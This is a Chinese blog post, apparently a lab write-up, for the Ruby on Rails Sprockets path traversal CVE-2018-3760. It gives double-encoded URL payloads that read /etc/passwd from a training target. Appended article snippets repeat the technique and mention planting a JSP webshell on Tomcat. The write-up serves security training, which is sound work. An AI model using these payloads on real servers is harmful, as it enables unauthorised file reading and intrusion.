0x1B.Ruby On Rails漏洞复现第一题(CVE-2018-3760)

最新推荐文章于 2024-07-19 08:37:17 发布
最新推荐文章于 2024-07-19 08:37:17 发布
阅读量528 收藏 1
点赞数
分类专栏: 墨者学院 文章标签: 墨者学院 Ruby On Rails CVE-2018-3760
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31679787/article/details/102549557
版权

构造payload,读取/etc/passwd文件;
http://219.153.49.228:46944/assets/file:%2f%2f/etc/passwd

passwd在黑名单中,不被允许访问,但是报错信息中给出了允许访问的目录,通过使用允许访问的目录可以跳转到/etc/passwd;

payload如下:http://219.153.49.228:46944/assets/file:%2f%2f/usr/src/blog/app/assets/config/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

漏洞详情:

https://www.seebug.org/vuldb/ssvid-97466

半情调
关注
专栏目录
CVE-2018-3760漏洞复现(任意文件读取)
千寻的博客
01-07 4119
CVE-2018-3760漏洞复现(任意文件读取) 0x00 漏洞介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它使用链轮作为开发环境中的静态文件服务器。Sprockets是一个编译和分发静态资源文件的Ruby库。 在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。 0x...
CVE-2019-5418漏洞复现
千寻的博客
01-07 4592
CVE-2019-5418漏洞复现 0x00 漏洞介绍 Ruby on Rails是一个web应用程序框架,是相对较新的web应用程序框架 构建在Ruby语言上 0x01漏洞原理 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{({{闭合模板路径)头来...
墨者靶场 Ruby On Rails漏洞复现第一CVE-2018-3760
曹振国的博客
06-09 613
Ruby On Rails介绍:解方向:关于【CVE-2018-3760漏洞分析可以看这两篇文章:影响版本:漏洞复现:一、访问靶机地址二、当我们使用`/assets/file:///etc/passwd`访问,发现`//`会被过滤,尝试进行url编码三、访问`/assets/file:%2f%2f/etc/passwd`通过报错得到用户可以访问的路径四、进行二次编码进行读取,得到key值 介绍: Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态
Ruby On Rails漏洞复现第一CVE-2018-3760
weixin_44281516的博客
08-03 399
墨者靶场环境 漏洞poc http://219.153.49.228:46238/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd 拿到key
Ruby On Rails 路径遍历漏洞CVE-2018-3760
最新发布
qq_23003811的博客
07-19 287
Ruby On Rails 是著名的 Ruby Web 开发框架,它在开发环境中使用 Sprockets 作为静态文件服务器。攻击者可以%252e%252e/用来访问根目录并读取或执行目标服务器上的任何文件,../第一次转码:%2E%2E/,因为%也要进行二次编码,第二次编码就是:%252e%252e/。1、/assets/file:%2f%2f/etc/passwd访问此路径,可得允许访问的路径白名单。2、构造payload访问,获取passwd文件。
墨者靶场】---3、Ruby On Rails漏洞复现第一CVE-2018-3760
qq_43168364的博客
08-21 345
背景介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。 实训目标 1、学会根据漏洞编号查找漏洞详情; 2、了解Ruby On RailsCVE-2018-3760)形成原理; 3、学习Ruby On RailsCVE-2018-3760)利用方法; 解方向 利用已知漏洞读取文件passwd 漏洞说明 Ruby On Rails在开发环境下使用Sprocket
Ruby On Rails 路径穿越漏洞(CVE-2018-3760)复现
qq_44579646的博客
03-14 248
墨者学院Ruby On Rails 路径穿越漏洞(CVE-2018-3760)复现 0x01 漏洞详情 Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器,Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。 Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上的任意文件。 0x02 漏洞利用 访问墨者学院的靶场
漏洞复现----14、Ruby On Rails 路径穿越漏洞CVE-2018-3760
七天
11-08 1317
文章目录一、Ruby on Rails 简介二、漏洞简介1、Sprockets简介三、漏洞复现 一、Ruby on Rails 简介 Ruby on Rails(官方简称为 Rails,亦被简称为 RoR),是一个使用 Ruby 语言写的开源 Web 应用框架,它是严格按照 MVC 结构开发的。它努力使自身保持简单,来使实际的应用开发时的代码更少,使用最少的配置。 Rails 的设计原则包括 “不做重复的事”(Don’t Repeat Yourself)和 “惯例优于设置”(Convention Ove
GitLab 目录遍历漏洞复现(CVE-2023-2825)
0xSec
05-27 3859
GitLab 存在目录遍历漏洞,当嵌套在至少五个组中的公共项目中存在附件时,未经身份验证的恶意用户可以利用该漏洞读取服务器上的任意文件。
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1000
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
墨者21道
帅醉了的博客
08-28 945
1.1.1.uWSGI 漏洞复现CVE-2018-7490) 测试详情 查找CVE-2018-7490漏洞,此漏洞构造…%2f可以访问任意文件,目录遍历,在key.txt前面多添加/…%2f…%2f…%2f…%2就可以得到key 1.1.2.Webmin未经身份验证的远程代码执行 测试详情 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。 受影响的版本:Webmin<=1.920 抓包 修改包 第一步,修改
Ruby On Rails漏洞复现第二CVE-2019-5418) --目录穿越
小白鸽
07-31 552
01 背景介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞,读取任意文件。 ({{闭合模板路径) 02 影响版本 Rails全版本 其中修复版本
Ruby On Rails 路径穿越与任意文件读取漏洞CVE-2018-3760CVE-2019-5418)
SoulCat
04-26 1016
Ruby On Rails 路径穿越与任意文件读取漏洞CVE-2018-3760CVE-2019-5418) "你知道深爱是什么感觉吗?" "就像房间突然黑了,我不是去找灯而是去找他。" 漏洞概述: Ruby on Rails(或者简称 Rails)是一个 Web 开发框架,使用 Ruby 编程语言开发。而2018主要是由于rails使用Sprockets作为静态文件服务器,在 Sproc...
墨者学院 Ruby On Rails漏洞复现第一CVE-2018-3760
人若无名,便可专心练剑
11-06 992
发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。
Ruby On Rails 路径穿越漏洞CVE-2018-3760
EC_Carrot的博客
07-23 257
漏洞简介 Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上任意文件。 漏洞复现 直接访问http://your-ip:3000/assets/file:%2f%2f/etc/passwd,将会报错,因为文件/etc/passwd不在允许的目录中: 我们通过报错页面,可以获得允许的目录列表。随便选择其中一个目录,如/usr/src/blog/app/assets/images,然后使用%252e%2
Ruby On Rails路径遍历漏洞 CVE-2018-3760 漏洞复现
ADummy的博客
03-01 592
Ruby On Rails路径遍历漏洞CVE-2018-3760) by ADummy 0x00利用路线 ​ 通过报错获取允许目录的列表—>通过允许的目录绕过访问任意文件 0x01漏洞介绍 ​ Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。 Sprockets 3.7.1及更低版本中的辅助解码导致路径穿越漏洞。攻击者可以%252e%252e/用来访问根目录
墨者学院-Tomcat 远程代码执行漏洞利用(第1)
臭nana的博客
01-02 1093
刷新页面,进行抓包,右击发送到repeater 将GET改为OPTIONS,查看允许的请求方式 再改为PUT,写进一个jsp木马,,返回201,代表写入成功,代码内容如下 &lt;%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%&gt; &lt;%!public static Strin...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值